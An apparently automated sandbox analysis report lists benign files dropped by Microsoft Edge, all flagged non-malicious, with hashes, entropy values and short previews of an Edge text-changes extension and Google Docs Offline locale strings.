                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_1346560684\CRX_INSTALL\content.js

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                Category:dropped
                                Size (bytes):9815
                                Entropy (8bit):6.1716321262973315
                                Encrypted:false
                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                Malicious:false
                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_1346560684\CRX_INSTALL\content_new.js

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                Category:dropped
                                Size (bytes):10388
                                Entropy (8bit):6.174387413738973
                                Encrypted:false
                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                Malicious:false
                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_1346560684\CRX_INSTALL\manifest.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):962
                                Entropy (8bit):5.698567446030411
                                Encrypted:false
                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                Malicious:false
                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_1346560684\a716bd7e-5cb7-4e12-aa9d-35e6a246db82.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):11185
                                Entropy (8bit):7.951995436832936
                                Encrypted:false
                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                Malicious:false
                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\5007de73-74e2-43bd-977a-3d1a8b067eaa.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):101423
                                Entropy (8bit):7.716355979337822
                                Encrypted:false
                                SSDEEP:3072:bBOJCAanDR3nNsalT7oxqnjyx+RjGj3XH6pN6n:9OJ78DRdsQgxqjQ+LEn
                                MD5:6457B577795F5C8949055DA3A8D3AB2E
                                SHA1:515B61672FE5F3B2A78B7A64D7B83FADAF43E4E0
                                SHA-256:52434403B00CD4AD818162921EB958AB318F2EAED1041CC0EB7216F97A63E950
                                SHA-512:DA6F36047A99BFB7D3E942BC1AD5F935EF9913899765A39E0B29CB117AB706948AB38AD5FA468507AECFB39612DA9C3C0E18C707496AF498390B00184CE61622
                                Malicious:false
                                Preview:Cr24....d.........0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........N..s...._?1n.'..S.rk........S........E..%..N.U.3.....7.)A.[z.&..)._....{._A.Wj.;.dxDo.G.n..>{J.Qn..h.....|......5.~.....{oOJ.2):...$.R=CVb.3.3....(..*.q..e.yg..vI...s..C.,..Qw..K/.......%.....R5......Q....W....V..5..2i|c9.....%Y.....e....;\.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!......o..K..K_TS....b.....i..... s.Re3B.g.;x[sb..)2.........u...".$............oo.:...h..G....yW......?..h.0-.ChC...|....]...q..T)m....k......CV...<..K..?....k.......YU?......W.Wy.......?........AS..!.m.f].f...q..9....JSmEr.......T/Rd...Y....j.....H.s......~...)l.o.g...)....K......x.....1bp.....uyG.....B

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\128.png

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):4982
                                Entropy (8bit):7.929761711048726
                                Encrypted:false
                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                Malicious:false
                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\af\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):908
                                Entropy (8bit):4.512512697156616
                                Encrypted:false
                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\am\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1285
                                Entropy (8bit):4.702209356847184
                                Encrypted:false
                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                SHA1:58979859B28513608626B563138097DC19236F1F
                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ar\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1244
                                Entropy (8bit):4.5533961615623735
                                Encrypted:false
                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\az\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):977
                                Entropy (8bit):4.867640976960053
                                Encrypted:false
                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                MD5:9A798FD298008074E59ECC253E2F2933
                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\be\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3107
                                Entropy (8bit):3.535189746470889
                                Encrypted:false
                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                Malicious:false
                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\bg\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1389
                                Entropy (8bit):4.561317517930672
                                Encrypted:false
                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\bn\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1763
                                Entropy (8bit):4.25392954144533
                                Encrypted:false
                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ca\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):930
                                Entropy (8bit):4.569672473374877
                                Encrypted:false
                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\cs\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):913
                                Entropy (8bit):4.947221919047
                                Encrypted:false
                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\cy\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):806
                                Entropy (8bit):4.815663786215102
                                Encrypted:false
                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                MD5:A86407C6F20818972B80B9384ACFBBED
                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
